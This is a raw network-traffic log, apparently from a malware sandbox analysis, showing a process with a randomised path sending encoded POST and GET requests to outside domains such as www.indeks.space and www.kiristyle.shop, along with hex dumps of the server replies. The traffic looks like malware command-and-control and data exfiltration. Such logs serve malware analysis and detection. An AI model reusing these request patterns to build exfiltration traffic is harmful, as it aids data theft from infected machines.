68 ec aa b0 a7 14 a6 18 a8 8e 23 1b 25 e9 ba 25 d1 0b d4 46 2e 28 0b 66 c8 51 e4 9b 76 18 62 f8 49 7f 07 4b c8 5a 6f 48 c8 e4 7b 26 fe ac 2e 97 04 e9 0e aa 1a c8 ae b2 ae 18 dc b0 59 0f ed c0 19 46 4d eb 58 fd e8 fa f9 0b e7 [TRUNCATED] Data Ascii: e2fZmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskktf8[:^_mh#%%F.(fQvbIKZoH{&.YFMX.[?fqyv^zcVJIy4JHPad%WAPvT,<6,F#mSQd4V~gma+\|\\|j-"RAqnj4T={\DL$x7 ;TJ}mj3h,8[J~xA!hv3y?YdnabJpAS[^#9603t~D31Js8(`6Ul?a>g)u-="3]cJH?fiEZ@lTy\wi{60Pv:0Q%Y#Nh=eK$o(U#@eg.k9KAl:d$:+A&Xt^#N\|%$7E\|?C`uXTTJX3R<Z5.$?NN&eoRH.j;W2l?EUM\| [TRUNCATED]
Aug 27, 2024 17:47:44.401973009 CEST	1239	IN	Data Raw: a7 9c 04 3d d9 b3 c8 af 38 ed 80 a7 14 0e 91 1e 40 16 1c 22 80 9e 39 3f cb 63 05 65 23 60 ec 4f 20 6c 3a 23 dd c7 ec 89 b5 d7 de 34 38 91 c9 b3 4b 74 c6 10 e9 3e 9c 8f 9e d2 63 a8 f4 38 15 2c c4 f7 60 4f bd cc 4b 0f 95 0a 57 92 87 bc d4 9b db b1 Data Ascii: =8@"9?ce#`O l:#48Kt>c8,`OKWpy62^="?*7(F>P8wV:_?2u2-ZNg82t.T0^S.hnEeYTg#)6Xtz(9~\|I\|}Jy\M:WlN?

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.11.20	49822	194.58.112.174	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:47:46.923988104 CEST	2578	OUT	POST /1fqp/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.indeks.space Origin: http://www.indeks.space Referer: http://www.indeks.space/1fqp/ Content-Length: 52933 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 33 6f 34 52 6c 39 50 4d 34 48 42 32 73 33 34 6e 41 65 41 49 41 45 54 51 51 38 2b 39 47 33 38 38 62 4d 64 63 61 58 56 6c 58 71 4b 44 37 50 4f 75 2b 71 45 61 31 51 66 68 6c 50 4d 63 5a 36 56 70 34 54 76 6f 45 71 2b 73 66 76 43 33 4a 7a 58 67 39 6c 75 59 61 5a 44 63 31 37 47 46 59 46 74 4f 6f 46 75 62 56 79 64 6a 43 55 51 62 4e 34 6a 49 35 50 51 47 72 43 42 52 62 4d 31 41 46 6e 62 37 61 74 4d 73 43 41 33 64 68 58 57 57 74 4e 58 4b 44 7a 6b 4e 6d 30 69 51 52 57 64 48 50 63 5a 4e 67 50 32 47 6b 37 73 6b 79 36 4b 6d 77 74 4b 72 50 56 64 2f 73 57 33 71 38 69 4f 47 73 31 39 79 52 55 37 2f 55 77 74 33 67 68 2f 6a 4c 6f 6e 70 33 52 70 39 78 31 56 4e 6c 67 30 50 6c 75 37 7a 49 4c 76 79 78 2b 59 6a 65 71 70 37 35 52 76 75 69 35 6b 47 77 77 62 78 38 41 53 66 67 68 43 6d 65 44 62 42 37 4c 6b 6c 43 44 43 41 52 55 76 67 54 67 56 39 77 6f 49 44 37 54 64 44 2f 66 46 61 56 44 51 44 36 55 6b 44 2b 68 69 6b 74 64 74 66 56 66 30 75 75 44 70 2f 79 69 4a 76 55 4b 53 4b 59 4c 4f 57 5a 6f 75 61 4d [TRUNCATED] Data Ascii: AvLLLbOh=3o4Rl9PM4HB2s34nAeAIAETQQ8+9G388bMdcaXVlXqKD7POu+qEa1QfhlPMcZ6Vp4TvoEq+sfvC3JzXg9luYaZDc17GFYFtOoFubVydjCUQbN4jI5PQGrCBRbM1AFnb7atMsCA3dhXWWtNXKDzkNm0iQRWdHPcZNgP2Gk7sky6KmwtKrPVd/sW3q8iOGs19yRU7/Uwt3gh/jLonp3Rp9x1VNlg0Plu7zILvyx+Yjeqp75Rvui5kGwwbx8ASfghCmeDbB7LklCDCARUvgTgV9woID7TdD/fFaVDQD6UkD+hiktdtfVf0uuDp/yiJvUKSKYLOWZouaMaUqr/R+E9dJmH6va3/BpxaQjjMrichteZh0LZb8VXFnUkgymNYZfm8g6yWX0iwUbvqaP/KI/nViubTWkmIobWuSdPHAlkUwI6bHEnJuHxygAGwzQJFGnehFTDSqLgcH9eEm9gymqCB+i9QS1/mmBhr4pyBdL1zD6J4USgsl/KZaYmWZ1zm3Xvn3jrDrX66IQeZA8nffNlAB5TrwUWjmtefVDCV9a9uoeN+XbaNcMS0UhKOLi8R/O4bVagcVwksQSNZCTUOYXGD8ba5l2PfO8JCWtpm9hMUnj4K4KyoNYD/qItcxJOgILnvzEzRvGw4wVw22Q+BAembw9c1lLxvUn0Sc80ZenLc8VheuBs9mdgKfLE8qZCuisf82k//gg9gebDIRckqKsv18w4bIAsUvGFHEbd9iFnr64hE8TCRr2wm8Gz/XTTobrJ/dnZpR69aKHuRx1nPwMIjUFOT0t02VjnicObBXX+SGfpTGQ2gv+jw+dL2TfYneAVgJb8cOvhPU0eiYE0fAQbvGIGH5ZaBI/KVsXZJIUEAQcpzARhiKMInrLtoI1zF+w0YYHV3gEy6p6GscgLLpiOz8SIVvhAACgCGSG1tAeDtMyz3YNx10vbe1novqjeASDPL5QxfjCUvMtjpxWq5MqIY4oxwpFjuv42V8wygCUrDRIpd [TRUNCATED]
Aug 27, 2024 17:47:46.924006939 CEST	3867	OUT	Data Raw: 49 2f 34 65 56 75 64 61 4d 4e 52 46 64 2b 4b 6d 41 50 49 4a 2f 64 41 49 47 42 67 65 72 56 2b 66 32 4f 42 77 56 73 6f 48 6d 38 47 43 6d 6d 68 4c 66 79 63 6e 6a 37 51 77 73 7a 48 47 32 41 47 69 6e 34 5a 72 6d 50 6d 51 64 65 51 64 30 4e 66 2f 32 34 Data Ascii: I/4eVudaMNRFd+KmAPIJ/dAIGBgerV+f2OBwVsoHm8GCmmhLfycnj7QwszHG2AGin4ZrmPmQdeQd0Nf/24x0hYRm3yk6HwDuS+rUz+kpbwWai5cqEqQpaG3NdOyNLab9IrWENNRVEITdSlKlwwEXDdFx1w6XaiPodBBRfrz/cMeCBbrKmEgIGuewRLMg4z1amITjA6iHqQt4IcAtzPb53ydcNIaVCx6SiRzNWpyUcABRO81eKh0
Aug 27, 2024 17:47:47.146655083 CEST	1289	OUT	Data Raw: 52 35 68 43 51 45 2b 53 43 37 67 6b 2f 52 68 4a 58 56 34 44 35 66 78 4f 48 6c 36 63 59 6e 30 59 4a 4b 6d 76 77 42 47 45 59 65 5a 72 4b 53 79 38 51 48 65 59 32 77 2b 72 56 6a 51 63 46 45 71 51 78 6a 43 41 50 32 36 42 66 36 2b 65 36 6e 47 63 36 59 Data Ascii: R5hCQE+SC7gk/RhJXV4D5fxOHl6cYn0YJKmvwBGEYeZrKSy8QHeY2w+rVjQcFEqQxjCAP26Bf6+e6nGc6YQeuvQvMdg7aSiTSZJ97iOURgnkMLZu4OHiL1DKjObSK8Wu6Bmgttchwkm3lrvVj7sR9yXF1ZJFC1JoWEd3kb1VyBApCgL+cE6hyeFVnEuqLZhz5+OVW0D2ZoneEBpa18mKEfoQG+MpW73eeuQ9d3rIaX5FVAkfT16
Aug 27, 2024 17:47:47.147047043 CEST	1289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 27 Aug 2024 15:47:47 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 65 32 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 74 bc 8e ea 87 66 38 94 b6 aa 5b ba bc ee 3a 5e 5f 04 ca 6d 94 c2 68 ec aa b0 a7 14 a6 18 a8 8e 23 1b 25 e9 ba 25 d1 0b d4 46 2e 28 0b 66 c8 51 e4 9b 76 18 62 f8 49 7f 07 4b c8 5a 6f 48 c8 e4 7b 26 fe ac 2e 97 04 e9 0e aa 1a c8 ae b2 ae 18 dc b0 59 0f ed c0 19 46 4d eb 58 fd e8 fa f9 0b e7 [TRUNCATED] Data Ascii: e2fZmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskktf8[:^_mh#%%F.(fQvbIKZoH{&.YFMX.[?fqyv^zcVJIy4JHPad%WAPvT,<6,F#mSQd4V~gma+\|\\|j-"RAqnj4T={\DL$x7 ;TJ}mj3h,8[J~xA!hv3y?YdnabJpAS[^#9603t~D31Js8(`6Ul?a>g)u-="3]cJH?fiEZ@lTy\wi{60Pv:0Q%Y#Nh=eK$o(U#@eg.k9KAl:d$:+A&Xt^#N\|%$7E\|?C`uXTTJX3R<Z5.$?NN&eoRH.j;W2l?EUM\| [TRUNCATED]
Aug 27, 2024 17:47:47.147166014 CEST	1289	IN	Data Raw: ae 56 4e 38 6a 6b 93 e7 92 b4 7d 30 dd 00 f1 d1 53 18 f7 cf 88 7a f7 93 2f e1 22 8f 93 cf e3 ef 44 4e aa 77 93 cf 75 78 a4 e2 ba 05 e2 4c f1 cc d1 6a 94 a7 b4 05 6a d8 50 32 1a 05 4a 27 7a 93 d5 65 ac d3 ca ea 0d 07 76 24 bd 2f 50 c3 fe 0e 19 c8 Data Ascii: VN8jk}0Sz/"DNwuxLjjP2J'zev$/PB[$Pzi(wA#`a1%wtZD7(.kLYyZdB&-@VPZcN2cn)<5=f
Aug 27, 2024 17:47:47.147181034 CEST	1239	IN	Data Raw: a7 9c 04 3d d9 b3 c8 af 38 ed 80 a7 14 0e 91 1e 40 16 1c 22 80 9e 39 3f cb 63 05 65 23 60 ec 4f 20 6c 3a 23 dd c7 ec 89 b5 d7 de 34 38 91 c9 b3 4b 74 c6 10 e9 3e 9c 8f 9e d2 63 a8 f4 38 15 2c c4 f7 60 4f bd cc 4b 0f 95 0a 57 92 87 bc d4 9b db b1 Data Ascii: =8@"9?ce#`O l:#48Kt>c8,`OKWpy62^="?*7(F>P8wV:_?2u2-ZNg82t.T0^S.hnEeYTg#)6Xtz(9~\|I\|}Jy\M:WlN?
Aug 27, 2024 17:47:47.147238016 CEST	1289	OUT	Data Raw: 63 74 4a 6c 4d 49 63 72 48 53 6d 65 45 55 6b 54 4d 31 4d 74 4b 77 33 73 78 47 6e 76 4c 50 37 72 33 32 6f 6d 36 79 73 74 67 56 65 53 67 48 72 6a 70 35 48 5a 57 6e 6a 64 62 36 53 43 6a 52 63 6c 71 5a 39 67 45 55 77 54 72 4d 59 52 4b 71 56 4d 4f 4c Data Ascii: ctJlMIcrHSmeEUkTM1MtKw3sxGnvLP7r32om6ystgVeSgHrjp5HZWnjdb6SCjRclqZ9gEUwTrMYRKqVMOLf6WgUlw/LL5W6HHbETSOOwXQUDbiLhBJbUf1VCiOyOvmmQdxWPB4ODTFPX9bxOLQ9ZQL+sE6oJL6Aq9j3QwPeEL4Inq6fQd9lkq58nr+6A0rhguoWk7v0RDAXTRMrboGEZ9VuJqCFRacK+dfccmLP5Gx0Twgv354m
Aug 27, 2024 17:47:47.147474051 CEST	2578	OUT	Data Raw: 62 51 33 46 4e 6e 73 5a 4c 47 2f 56 2b 45 51 6a 65 67 44 6f 6f 36 4a 7a 74 56 72 57 4a 5a 2b 62 73 73 65 49 64 32 70 33 43 76 73 53 4f 42 65 38 63 47 54 44 4b 39 68 4d 45 41 4a 6a 6e 6e 46 58 6f 70 67 4f 33 4f 4b 35 47 73 62 79 57 6c 6a 4d 53 34 Data Ascii: bQ3FNnsZLG/V+EQjegDoo6JztVrWJZ+bsseId2p3CvsSOBe8cGTDK9hMEAJjnnFXopgO3OK5GsbyWljMS4cHf57ccbidNQASCGdHpiUPb9INJ3grEItwTAEyQeHkqe0hjfYUD6bmtzADwArryTU+/wdxRV9mHnAqHdqS9cAfYrXJY1+b9zmHf1C9B9fY3ZJtqjrRlvrJgtBvH/XefHauG+hR8wCvJ/+VnqeNGWjIqDWhYDtWe/F
Aug 27, 2024 17:47:47.188894033 CEST	1289	OUT	Data Raw: 6f 31 6d 52 51 57 61 4e 6c 49 47 76 6b 2f 33 7a 51 65 46 74 41 52 47 2f 68 6d 39 72 36 31 41 69 67 30 2b 48 45 56 76 4c 66 77 76 74 64 76 6e 65 47 59 34 6c 2b 37 47 63 4a 6c 59 2f 6a 37 70 36 51 79 71 68 72 58 31 54 74 48 7a 4d 6e 4e 77 70 6f 65 Data Ascii: o1mRQWaNlIGvk/3zQeFtARG/hm9r61Aig0+HEVvLfwvtdvneGY4l+7GcJlY/j7p6QyqhrX1TtHzMnNwpoeVlF2bEpSKTMHYWJyQAvRFaQMFlZEd2/J7nYcnuEQ0h/11gD3rNADSKZ68sHd8YV92nJsfbZtNDm0/uqM1okfF1DAVBW+xRa5hT1vFc0tBLidevFqFKXrVTgVA/wF1hIEXNUZI5sf/AxA+A1LXzk+XM/PZnKTYxDaX
Aug 27, 2024 17:47:47.372658014 CEST	1289	OUT	Data Raw: 37 4d 58 34 6f 74 73 79 57 64 2f 4b 74 33 70 2b 46 35 66 76 43 34 36 41 34 4b 4e 6b 47 69 4c 41 41 30 62 79 6d 57 79 64 50 65 70 4c 42 64 70 69 65 58 4d 55 30 64 39 6f 52 5a 44 53 54 6a 41 57 68 44 73 59 49 51 7a 4d 50 66 37 76 35 36 65 6c 65 43 Data Ascii: 7MX4otsyWd/Kt3p+F5fvC46A4KNkGiLAA0bymWydPepLBdpieXMU0d9oRZDSTjAWhDsYIQzMPf7v56eleCN/IZUBvjfaYkAtCGgngdkSHUqXgD+dxvFTNewykATdRLYYsCaoNKntTuKYZIkAustXJfOtJfM13tDLLMO+nSTscYmaMrzp0N1JF61LmXmeYtLoUyYNhegPJhUeEpOqx/lmjGVbhGs5ZYZRvbAezo+0Amk6dWdiyhW
Aug 27, 2024 17:47:47.372858047 CEST	1289	OUT	Data Raw: 2f 63 51 4a 66 4a 62 71 6d 71 54 30 50 55 7a 4d 6f 45 4b 38 69 75 54 46 5a 41 4f 49 4e 6b 4b 4d 43 49 68 37 37 7a 5a 50 6d 72 4e 43 49 4b 5a 72 57 4f 36 42 56 32 49 32 68 32 46 68 55 34 56 30 4d 45 53 50 4b 52 55 68 42 53 47 54 51 56 72 5a 69 53 Data Ascii: /cQJfJbqmqT0PUzMoEK8iuTFZAOINkKMCIh77zZPmrNCIKZrWO6BV2I2h2FhU4V0MESPKRUhBSGTQVrZiS6aAwowurX8k/T6zJYJaGofwxc0C2oJ4f20OYYoJdhO9YvEFexaQGndSJeM1kuluxn76hZVthkg89d+Ee4x5qDAvTk/TuNCF1XsrYTdqnuSox/bnSbczPU2MQ5op2tLrfYl7+vLOhw/gG1k/EWnez6ShcRQs0FrsBl
Aug 27, 2024 17:47:47.411923885 CEST	2578	OUT	Data Raw: 69 72 31 51 79 4d 36 49 34 67 47 61 54 4d 6a 58 59 4d 44 64 49 7a 75 76 48 42 63 37 4a 63 6f 76 63 41 38 6d 63 62 67 59 6c 43 7a 73 66 78 68 64 6c 30 44 35 31 53 6e 48 37 4d 35 76 48 55 4e 49 66 69 75 58 55 2f 6f 37 30 7a 67 4e 72 4e 49 6c 2f 52 Data Ascii: ir1QyM6I4gGaTMjXYMDdIzuvHBc7JcovcA8mcbgYlCzsfxhdl0D51SnH7M5vHUNIfiuXU/o70zgNrNIl/RNKOHwopRE0ygdUUOCTFcg7YAORoHYyYJJ/Kk/xfCzkJ5F9FGfRw5i2kR+no2oqIfKofbndnCtBCs8XNnUeyxFqhsOl3B/GvvkkVXpMq7Pw4KdsxVFLUyTv2xEhYhWibBPo1A2cmD5fgvIcsV8fwCOL/TLyeZu0AbN

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.11.20	49823	194.58.112.174	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:47:49.687769890 CEST	525	OUT	GET /1fqp/?7RB=66nPyLG8&AvLLLbOh=6qQxmJ3Ttl5RniwiWug+Nxykd+6yd18sY/lOZ1tjFrv55oSFkvFWhSP7kPUWLsM6iDX/GYi1Ud/wPB7htSWHGJqJldTcfRVJgzvdZiQtfUg3P6HLle1MpkQ= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.indeks.space Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Aug 27, 2024 17:47:49.912497044 CEST	1289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 27 Aug 2024 15:47:49 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 32 39 33 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 69 6e 64 65 6b 73 2e 73 70 61 63 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 [TRUNCATED] Data Ascii: 293d<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.indeks.space</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/<![CDATA[/window.trackScriptLoad = function(){};/.../</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text">  <a class="b-link" href="https://reg.ru" [TRUNCATED]
Aug 27, 2024 17:47:49.912590981 CEST	1289	IN	Data Raw: 74 79 70 65 5f 68 6f 73 74 69 6e 67 2d 6f 76 65 72 61 6c 6c 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 2d 68 65 61 64 65 72 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f Data Ascii: type_hosting-overall"><div class="b-parking__promo-header"><span class="b-parking__promo-image b-parking__promo-image_type_hosting"></span><div class="l-margin_left-large"><strong class="b-title b-title_size_large-compact"></stro
Aug 27, 2024 17:47:49.912606001 CEST	1289	IN	Data Raw: 70 70 65 72 5f 73 74 79 6c 65 5f 69 6e 64 65 6e 74 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 5f 74 79 70 65 5f 68 6f 73 74 69 6e 67 2d 73 74 61 74 69 63 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 Data Ascii: pper_style_indent b-page__content-wrapper_type_hosting-static"><div class="b-parking__header-content"><h1 class="b-parking__header-title">www.indeks.space</h1><p class="b-parking__header-description b-text">
Aug 27, 2024 17:47:49.912739992 CEST	1289	IN	Data Raw: 67 5f 5f 62 75 74 74 6f 6e 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 62 75 74 74 6f 6e 5f 74 79 70 65 5f 68 6f 73 74 69 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 67 2e 72 75 2f 68 6f 73 74 69 6e 67 2f 3f 75 74 6d 5f 73 6f Data Ascii: g__button b-parking__button_type_hosting" href="https://www.reg.ru/hosting/?utm_source=www.indeks.space&utm_medium=parking&utm_campaign=s_land_host&reg_source=parking_auto"> </a><p class="b-price b-parking__pric
Aug 27, 2024 17:47:49.912754059 CEST	1289	IN	Data Raw: d0 bd d0 b8 d1 8f 20 d0 bd d0 b0 26 6e 62 73 70 3b 43 4d 53 3c 2f 73 74 72 6f 6e 67 3e 3c 70 20 63 6c 61 73 73 3d 22 62 2d 74 65 78 74 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 2d 64 65 73 63 72 69 70 74 69 6f 6e 22 3e d0 98 d1 81 d0 bf Data Ascii:  CMS</strong><p class="b-text b-parking__promo-description">  CMS
Aug 27, 2024 17:47:49.912844896 CEST	1289	IN	Data Raw: 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 6a 73 27 2c 20 31 29 22 20 73 Data Ascii: king-rdap-auto.js')" onerror="window.trackScriptLoad('parking-rdap-auto.js', 1)" src="parking-rdap-auto.js" charset="utf-8"></script><script>function ondata(data){ if ( data.error_code ) { return; }
Aug 27, 2024 17:47:49.913024902 CEST	1289	IN	Data Raw: 6f 64 79 20 3f 20 27 74 65 78 74 43 6f 6e 74 65 6e 74 27 20 3a 20 27 69 6e 6e 65 72 54 65 78 74 27 3b 0a 0a 20 20 20 20 20 20 20 20 76 61 72 20 64 6f 6d 61 69 6e 4e 61 6d 65 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 2e 6d 61 74 63 68 28 Data Ascii: ody ? 'textContent' : 'innerText'; var domainName = document.title.match( /(xn--\|[0-9]).+\.(xn--)[^\s]+/ )[0]; if ( domainName ) { var domainNameUnicode = punycode.ToUnicode( domainName ); document.ti
Aug 27, 2024 17:47:49.913038969 CEST	1289	IN	Data Raw: 3e d0 97 d0 b0 d0 ba d0 b0 d0 b7 d0 b0 d1 82 d1 8c 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 2d 69 74 65 6d 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 73 73 6c 2d 70 72 6f 74 65 63 Data Ascii: ></a></div><div class="b-parking__promo-item b-parking__ssl-protection"><span class="b-parking__promo-image b-parking__promo-image_type_ssl l-margin_right-large"></span> <strong class="b-title b-title_size_large-compact b-title
Aug 27, 2024 17:47:49.913049936 CEST	408	IN	Data Raw: 65 72 74 42 65 66 6f 72 65 28 6b 2c 61 29 7d 29 0a 20 20 20 20 28 77 69 6e 64 6f 77 2c 20 64 6f 63 75 6d 65 6e 74 2c 20 22 73 63 72 69 70 74 22 2c 20 22 68 74 74 70 73 3a 2f 2f 6d 63 2e 79 61 6e 64 65 78 2e 72 75 2f 6d 65 74 72 69 6b 61 2f 74 61 Data Ascii: ertBefore(k,a)}) (window, document, "script", "https://mc.yandex.ru/metrika/tag.js", "ym"); ym(54200914, "init", { clickmap:true, trackLinks:true, accurateTrackBounce:true, webvisor:true });</script><noscript><div>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.11.20	49824	35.244.245.121	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:47:55.811145067 CEST	794	OUT	POST /x85c/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.kiristyle.shop Origin: http://www.kiristyle.shop Referer: http://www.kiristyle.shop/x85c/ Content-Length: 205 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 56 31 4f 6f 77 31 76 70 36 63 6e 4d 4b 45 48 78 72 36 56 39 43 72 67 78 2b 56 34 53 65 78 41 37 79 62 2f 39 6f 6e 38 79 6d 55 77 69 48 56 70 51 33 34 66 38 6b 57 4b 7a 65 31 58 67 47 64 6c 37 6b 58 7a 39 30 6a 69 4d 50 63 42 75 4f 4a 66 4c 68 75 41 36 48 7a 5a 30 69 4d 44 76 4b 50 55 72 35 68 39 78 4d 4f 38 46 6a 70 4a 70 38 77 71 74 46 72 54 4a 6e 49 57 33 69 4c 4e 79 4b 59 43 53 47 55 2b 64 4f 34 4a 4d 4a 2f 63 71 34 63 33 45 65 56 63 52 56 35 2b 53 69 49 79 66 66 54 36 6f 78 4d 49 32 38 46 38 43 6c 30 35 47 4a 66 4b 75 39 31 71 59 45 38 2f 2b 39 45 6b 64 55 54 72 7a 74 67 3d 3d Data Ascii: AvLLLbOh=V1Oow1vp6cnMKEHxr6V9Crgx+V4SexA7yb/9on8ymUwiHVpQ34f8kWKze1XgGdl7kXz90jiMPcBuOJfLhuA6HzZ0iMDvKPUr5h9xMO8FjpJp8wqtFrTJnIW3iLNyKYCSGU+dO4JMJ/cq4c3EeVcRV5+SiIyffT6oxMI28F8Cl05GJfKu91qYE8/+9EkdUTrztg==
Aug 27, 2024 17:47:55.970052004 CEST	357	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 27 Aug 2024 15:47:55 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.kiristyle.shop/x85c/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 